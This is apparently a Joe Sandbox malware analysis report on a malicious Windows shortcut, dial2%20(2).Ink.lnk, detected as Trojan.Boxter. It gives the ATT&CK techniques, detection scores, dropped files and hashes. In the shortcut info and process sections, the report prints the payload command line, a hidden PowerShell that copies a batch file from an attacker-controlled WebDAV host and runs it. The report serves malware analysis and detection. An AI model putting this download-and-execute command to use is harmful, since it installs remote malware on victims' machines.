Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6976Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
PowerShell		1
DLL Side-Loading		1
Process Injection		21
Virtualization/Sandbox Evasion		OS Credential Dumping11
Process Discovery		Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory21
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets11
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
dial2%20(2).Ink.lnk18%ReversingLabsBinary.Trojan.Boxter
dial2%20(2).Ink.lnk22%VirustotalBrowse
dial2%20(2).Ink.lnk100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
https://pizza-practices-representative-country.trycloudflare.com.Z20%Avira URL Cloudsafe
https://pizza-practices-representative-country.trycloudflare.com0%Avira URL Cloudsafe
https://github.com/Pester/Pester0%Avira URL Cloudsafe
https://pizza-practices-representative-country.trycloudflare.com0%VirustotalBrowse
https://github.com/Pester/Pester1%VirustotalBrowse

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1323560124.000002202751E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1323560124.0000022027661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000003.00000002.1303535300.0000022018CEC000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://pizza-practices-representative-country.trycloudflare.comdial2%20(2).Ink.lnktrue
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1303535300.0000022018D0A000.00000004.00000800.00020000.00000000.sdmptrue
  • URL Reputation: malware
unknown
https://pizza-practices-representative-country.trycloudflare.com.Z2dial2%20(2).Ink.lnktrue
  • Avira URL Cloud: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1303535300.0000022018D0A000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://contoso.com/powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1323560124.000002202751E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1323560124.0000022027661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://contoso.com/Licensepowershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://contoso.com/Iconpowershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://oneget.orgXpowershell.exe, 00000003.00000002.1303535300.0000022018CEC000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://aka.ms/pscore68powershell.exe, 00000003.00000002.1303535300.00000220174B1000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1303535300.00000220174B1000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1303535300.0000022018D0A000.00000004.00000800.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://oneget.orgpowershell.exe, 00000003.00000002.1303535300.0000022018CEC000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1447087
Start date and time:2024-05-24 11:02:12 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 1s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:18
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:dial2%20(2).Ink.lnk
Detection:MAL
Classification:mal76.rans.winLNK@2/5@0/0
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 3
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .lnk

Warnings

  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target powershell.exe, PID 1244 because it is empty
  • Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

TimeTypeDescription
05:03:02API Interceptor7x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1940658735648508
Encrypted:false
SSDEEP:3:Nlllultnxj:NllU
MD5:F93358E626551B46E6ED5A0A9D29BD51
SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
Malicious:false
Reputation:moderate, very likely benign file
Preview:@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nwmizi4.mvm.ps1

Download File
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:high, very likely benign file
Preview:# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npbnqcxg.prb.psm1

Download File
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:high, very likely benign file
Preview:# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\06VFN979D6F9VAOAY7LF.temp

Download File
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):4578
Entropy (8bit):3.771645922767482
Encrypted:false
SSDEEP:48:NlxN1zv/AQlUWTSogZoiNkP/AQlKTSogZoiNQ1:Nll/AQkHlNy/AQ3HlNi
MD5:2845D3DA589EDD181DAD7D2614461CF3
SHA1:0ADC5AF856BABFC08DA4E6345BB6ED912EEEECD9
SHA-256:580000DC87D3B202B4A79296AC94C5B8911B472B087C6EF28F81050600A17FDC
SHA-512:F93291708CA4C05E995C93A8F4167BFDC43E4B5B658F10CC9583C54E62D095F859262737BADA20227819EDA5B173ACE3C18E634540D862191392662D9D8C613D
Malicious:false
Reputation:low
Preview:...................................FL..................F. .. .....l.....M-......,.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&........DDj.....1.l...iQP-......t.2......X`H .DIAL2%~1.LNK..X......EW.J.X`H...........................U..d.i.a.l.2.%.2.0.(.2.)...I.n.k...l.n.k.......X...............-.......W...........NL.t.....C:\Users\user\Desktop\dial2%20(2).Ink.lnk..'.\.\.d.i.a.t.r.u.i.e.s.t...c.o.m.@.8.0.\.s.n.i.p.t.o.o.l.\.w.o.r.k.\.a...i.c.o.`.......X.......124406...........hT..CrF.f4... .k.E._c...,...E...hT..CrF.f4... .k.E._c...,...E..........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.....3.8l....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.J..Windows.@......OwH.X`H....3.........................W.i.n.d.o.w.s.....Z.1......XZH..System32..B......OwH.X\

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\1c9a6b6d5b9db7b.customDesusertions-ms (copy)

Download File
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):4578
Entropy (8bit):3.771645922767482
Encrypted:false
SSDEEP:48:NlxN1zv/AQlUWTSogZoiNkP/AQlKTSogZoiNQ1:Nll/AQkHlNy/AQ3HlNi
MD5:2845D3DA589EDD181DAD7D2614461CF3
SHA1:0ADC5AF856BABFC08DA4E6345BB6ED912EEEECD9
SHA-256:580000DC87D3B202B4A79296AC94C5B8911B472B087C6EF28F81050600A17FDC
SHA-512:F93291708CA4C05E995C93A8F4167BFDC43E4B5B658F10CC9583C54E62D095F859262737BADA20227819EDA5B173ACE3C18E634540D862191392662D9D8C613D
Malicious:false
Reputation:low
Preview:...................................FL..................F. .. .....l.....M-......,.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&........DDj.....1.l...iQP-......t.2......X`H .DIAL2%~1.LNK..X......EW.J.X`H...........................U..d.i.a.l.2.%.2.0.(.2.)...I.n.k...l.n.k.......X...............-.......W...........NL.t.....C:\Users\user\Desktop\dial2%20(2).Ink.lnk..'.\.\.d.i.a.t.r.u.i.e.s.t...c.o.m.@.8.0.\.s.n.i.p.t.o.o.l.\.w.o.r.k.\.a...i.c.o.`.......X.......124406...........hT..CrF.f4... .k.E._c...,...E...hT..CrF.f4... .k.E._c...,...E..........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.....3.8l....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.J..Windows.@......OwH.X`H....3.........................W.i.n.d.o.w.s.....Z.1......XZH..System32..B......OwH.X\

Static File Info

General

File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Fri Feb 2 17:37:06 2018, mtime=Fri Feb 2 17:37:12 2018, atime=Fri Feb 2 17:37:06 2018, length=446976, window=hidenormalshowminimized
Entropy (8bit):4.571668912155042
TrID:
  • Windows Shortcut (20020/1) 100.00%
File name:dial2%20(2).Ink.lnk
File size:2'247 bytes
MD5:45e87e98e99ea69c34b4636c8e085e16
SHA1:2a7ab675507ce0dcd0639f07bdacec2f3718b3d1
SHA256:fa39116396d122c184476400edd9c0995ad5c7a8976d6cfba95fa3cb258767dc
SHA512:ff0e5f9f56bfb7fa2786b80e976d0891443f68e21ba7ec1ba31a9585074df9aa1d6be255c7943cd985b78ca8b09b15909018576d67282f7d61b7c67a82036e17
SSDEEP:48:8GlZtezvs9bvYH1bjJ2JXjJ2KevG3d5JBE2Fe7:8EZtQ+bvYH1fJCzJne4dTBE8e7
TLSH:7741CD1227FA4310F2F34B7469F967A59A72746BAB41DA9E0200406E0DB1F24ED24FB7
File Content Preview:L..................F.... ....h..T...P5..T....-..T................................P.O. .:i.....+00.../C:\...................V.1......X8...Windows.@........H.0.X8...../.......................Q.W.i.n.d.o.w.s.....Z.1......X."..System32..B........H.0.X."......

File Icon

Icon Hash:74f0e4e4e4e1e1ed

Static Windows Shortcut Info

General

Relative Path:
Command Line Argument:-w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden"
Icon location:\\diatruiest.com@80\sniptool\work\a.ico

Network Behavior

No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Target ID:3
Start time:05:02:59
Start date:24/05/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden"
Imagebase:0x7ff760310000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:4
Start time:05:02:59
Start date:24/05/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70f010000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Disassembly

Reset < >

    Executed Functions

    Function 00007FF8884B2D55 Relevance: .1, Instructions: 52COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.1329195554.00007FF8884B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8884B0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_7ff8884b0000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 9f7ed5c8e6347abee6e1cd2eab3ad510a55c107cac750f217366d67f96071ac7
    • Instruction ID: 70e9dc9444a0758478d1a2fba7992557b85c4e84294fe28d2ba5704cfb1cbd2d
    • Opcode Fuzzy Hash: 9f7ed5c8e6347abee6e1cd2eab3ad510a55c107cac750f217366d67f96071ac7
    • Instruction Fuzzy Hash: D001F133E0DAD98FE796DAE894802B8BBA2FF58751F4400BED04CDB093DA289814C345
    Function 00007FF8883E33B5 Relevance: .0, Instructions: 49COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.1328901815.00007FF8883E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8883E0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_7ff8883e0000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
    • Instruction ID: 139f69093de707e2bf1feccc8aa0283affab874a5fb227b685fe4c20e4a9c3a3
    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
    • Instruction Fuzzy Hash: E001677121CB0D4FDB44EF4CE451AA5B7E0FB99364F10056DE58AC3661DB36E882CB46
    Function 00007FF8884B2D82 Relevance: .0, Instructions: 38COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.1329195554.00007FF8884B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8884B0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_7ff8884b0000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 470e7ca9d086adfd0e5716267fdc40517f53c36c224a2d237dc266eccaed4653
    • Instruction ID: 68b9a6e92f7f980da41fe331fc6076e02daf9a09619e535d8e88dd436e055043
    • Opcode Fuzzy Hash: 470e7ca9d086adfd0e5716267fdc40517f53c36c224a2d237dc266eccaed4653
    • Instruction Fuzzy Hash: B0F0BE33E0E6988FE756EAECA4442FCBBA1FB586A1F0400BFD04CDB193E92848458351